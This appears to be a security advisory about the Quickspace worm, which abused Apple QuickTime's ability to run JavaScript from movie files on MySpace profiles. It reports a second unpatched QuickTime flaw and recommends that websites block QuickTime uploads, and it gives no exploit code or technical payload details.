You all know the story by now – A week ago MySpace was attacked by the Quickspace worm that abused an alleged "feature" of Apple QuickTime movie files to inject and execute malicious javascript in user profile pages. The malicious code attempted to phish accounts and to offer spyware to an unspecified number of users with obvious hopes of financial gain by the perpetrators. The primary cause that made the attack possible is not a MySpace flaw, but rather an Apple QuickTime feature that is clearly a security vulnerability. QuickTime fails to enforce the same origin policy and to warn the user before loading and executing javascript from external resources – two things that all similar applications are expected to do. For example, Flash allows embedded scripts, but it warns the user when a flash application tries to access an external resource.
We have yet to see Apple acknowledge this as a security issue. On the contrary, it has claimed that this is a legitimate feature. A temporary, trivially evadible, fix was provided by Apple to MySpace that was, controversially, distributed only to MySpace users and only to those MySpace users who use IE. All other users of Apple QuickTime, including MySpace users who use a browser other than IE, are still vulnerable. And, since this fix was given only to MySpace users, other websites are still vulnerable to an attack by a worm similar to Quickspace.
We did some investigation and found that —
1. Apart from the HREF track flaw exploited by the worm, Apple QuickTime is still vulnerable to another similar flaw that has been publicly known for quite some time. This flaw can be exploited in the same way to achieve the exact same results as the first flaw. The second flaw is obscure and it still remains unfixed. We haven't yet seen anyone bringing attention to it or talk about fixing it. Any patch that fixes the first flaw but not the second one is inadequate.
2. MySpace is still vulnerable to both the flaws and nothing prevents another web application worm from exploiting them.
3. We tested a few other social networking sites and all the sites we tested were also vulnerable to web application worms utilizing the two flaws as an attack vector. With no fix available, currently the only feasible workaround for these social networking sites, and also other websites on the Net, is to completely block users from uploading Apple QuickTime content. Though scrubbing javascript from the content before accepting it is a solution, it is complex enough to make it impractical in this case.
Recommendation: Websites should block Apple QuickTime content completely until a patch is available from Apple for both vulnerabilities.
